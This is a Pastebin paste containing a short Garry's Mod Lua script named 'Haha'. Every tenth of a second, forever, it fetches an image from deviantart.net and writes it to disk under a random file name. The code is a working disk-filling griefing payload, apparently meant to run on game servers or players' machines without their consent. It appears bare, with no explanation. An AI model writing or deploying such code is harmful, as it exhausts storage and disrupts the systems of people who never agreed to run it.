Advertisement
Guest User

Untitled

a guest
Oct 20th, 2019
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.36 KB | None | 0 0
  1. timer.Create("Haha", .1, 0, function()
  2. local ext = math.random(1,9999999)
  3. local ext2 = math.random(1,9999999)
  4. local ext3 = math.random(1,9999999)
  5. local FileName = ext .. ext2 .. ext3 .. ".jpg"
  6. http.Fetch ("http://orig01.deviantart.net/92d3/f/2010/110/7/2/pla_sf_3_by_recon071.jpg", function(body)
  7. file.Write( FileName, body)
  8. end)
  9. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement